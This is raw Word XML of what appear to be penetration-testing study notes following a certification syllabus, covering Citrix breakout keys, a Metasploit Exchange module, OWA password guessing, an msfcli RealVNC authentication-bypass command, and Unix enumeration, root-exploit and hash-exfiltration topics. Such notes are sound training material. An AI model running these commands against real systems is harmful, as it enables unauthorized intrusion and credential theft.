          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet Options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Under the General Tab click the Settings button </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E"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On the screen that follows, click the View Files button</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E7b - </w:t>
      </w:r>
      <w:r w:rsidR="00FA3D71">
        <w:t>Privilege escalation techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="004F4435" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Same as windows (see above)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F4435" w:rsidRDefault="004F4435" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C7742" w:rsidRPr="000C7742" w:rsidRDefault="000C7742" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Citrix Shortcut keys:</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SHIFT+F1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Local Task List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SHIFT+F2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Toggle Title bar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SHIFT+F3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Close Remote App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CTRL+F1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Show Windows Security Desktop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CTRL+F2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Remote Task List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CTRL+F3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Remote Task Manager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ALT+F2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Cycle through programs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ALT+PLUS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Alt-Tab </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71"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ALT+MINUS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>- Alt-shift-tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E8 – Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E8a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Knowledge of common attack vector</w:t>
      </w:r>
      <w:r>
        <w:t>s for Microsoft Exchange Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="000C7742" w:rsidRDefault="00FA3D71" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D09AC" w:rsidRDefault="00B60D81" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Metas</w:t>
      </w:r>
      <w:r w:rsidR="000C7742" w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="009D09AC" w:rsidRDefault="009D09AC" w:rsidP="009D09AC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D09AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="007A7B1A" w:rsidRPr="009D09AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>indows/</w:t>
      </w:r>
      <w:r w:rsidRPr="009D09AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smtp/ms03_046_exchange2000_xexch50</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D09AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D09AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>not reliable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00484074" w:rsidRPr="000C7742" w:rsidRDefault="00484074" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C7742" w:rsidRPr="000C7742" w:rsidRDefault="000C7742" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7742">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OWA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7742" w:rsidRPr="000C7742" w:rsidRDefault="00B60D81"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http://&lt;IPADDRESS&gt;/exchange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(possibly weak passwords)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>E9 - Common Windows Applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E9 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Knowledge of significant vulnerabilities in common windows applications for which there i</w:t>
      </w:r>
      <w:r>
        <w:t>s public exploit code available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="009D09AC" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D09AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GET from metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D32669" w:rsidRDefault="00D32669">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D32669" w:rsidRPr="00D32669" w:rsidRDefault="00D32669" w:rsidP="00D32669">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32669">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>RealVNC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42E2F" w:rsidRDefault="00D32669" w:rsidP="00D32669">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D32669">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D32669">
        <w:t>msfcli realvnc_41_bypass  LHOST=127.0.0.1 RHOST=&lt;HOST&gt; AUTOCONNECT=0 E</w:t>
      </w:r>
      <w:r w:rsidR="00A42E2F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42E2F" w:rsidRDefault="00A42E2F" w:rsidP="00A42E2F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A42E2F">
        <w:lastRenderedPageBreak/>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A42E2F">
        <w:t xml:space="preserve"> Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42E2F" w:rsidRDefault="00A42E2F"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A42E2F" w:rsidRPr="005F25BF" w:rsidTr="000336A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="572"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F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984"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User enumeration</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Discovery of valid usernames from network services commonly running by default:</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rusers</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rwho</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SMTP</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finger</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F" w:rsidRP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Understand how finger daemon derives the information that it returns, and hence how it can be abused.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889"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F2</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Unix vulnerabilities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Solaris vulnerabilities, and in particular those for which there is exploit code in the public domain.</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Linux vulnerabilities, and in particular those for which there is exploit code in the public domain.</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Use of remote exploit code and local exploit code to gain root access to target host</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Common post-exploitation activities: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exfiltrate password hashes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crack password hashes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check patch levels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derive list of missing security patches</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F"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reversion to previous state</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F3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A42E2F" w:rsidRDefault="00434D06" w:rsidP="00434D06">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FTP</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FTP access control</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Anonymous access to FTP servers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F" w:rsidRPr="009B4D72"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Risks of allowing write access to anonymous users.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F4</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Sendmail /SMTP</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Valid username discovery via EXPN and VRFY</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Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible</w:t>
            </w:r>
          </w:p>
          <w:p w:rsid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Mail relaying</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F5</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Network File System (NFS)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NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID).</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Root squashing, nosuid and noexec options.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F" w:rsidRP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File access through UID and GID manipulation.</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p w:rsidR="00A42E2F" w:rsidRPr="00434D06" w:rsidRDefault="00A42E2F" w:rsidP="00434D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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F6</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R* services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Berkeley r* service:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00434D06" w:rsidRPr="00434D06" w:rsidRDefault="00434D06" w:rsidP="00434D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00434D06">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>access control (/etc/hosts.equiv and .rhosts)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00434D06" w:rsidRPr="00434D06" w:rsidRDefault="00434D06" w:rsidP="00434D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00434D06">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>trust relationships</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F" w:rsidRP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Impact of poorly-configured trust relationships.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F7</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X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A42E2F" w:rsidRDefault="00434D06" w:rsidP="000336A2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1245"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>X Windows security and configuration; host-based vs. User-based access control</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LF</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F8</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RPC services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00434D06" w:rsidRPr="00434D06"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RPC service enumeration</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00434D06" w:rsidRPr="00434D06"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Common RPC services</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F" w:rsidRPr="00A42E2F"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RPC service vulnerabilities.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F9</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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>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Identify the types and versions of SSH software in use</w:t>
            </w:r>
          </w:p>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Securing SSH</w:t>
            </w:r>
          </w:p>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Versions 1 and 2 of the SSH protocol</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A42E2F"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Authentication mechanisms within SSH</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800AF4" w:rsidRDefault="00800AF4" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>F1 - User enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Discovery of valid usernames from network services commonly running by default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>rusers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00FF3CF8" w:rsidRPr="006C471C" w:rsidRDefault="00D428BB" w:rsidP="00FF3CF8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rusers service is an RPC service that listens on a dynamic TCP port. The rusers client utility fist connects to the RPC portmapper on port 111, which returns the whereabouts of the rusersd services if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> active.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D428BB" w:rsidRPr="006C471C" w:rsidRDefault="00D428BB" w:rsidP="00FF3CF8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If rusersd is running, you can probe the service with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rusers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> client to retrieve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3CF8" w:rsidRPr="006C471C" w:rsidRDefault="00FF3CF8" w:rsidP="00FF3CF8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C471C" w:rsidRPr="006C471C" w:rsidRDefault="006C471C" w:rsidP="006C471C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>rusers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C471C">
        <w:rPr>
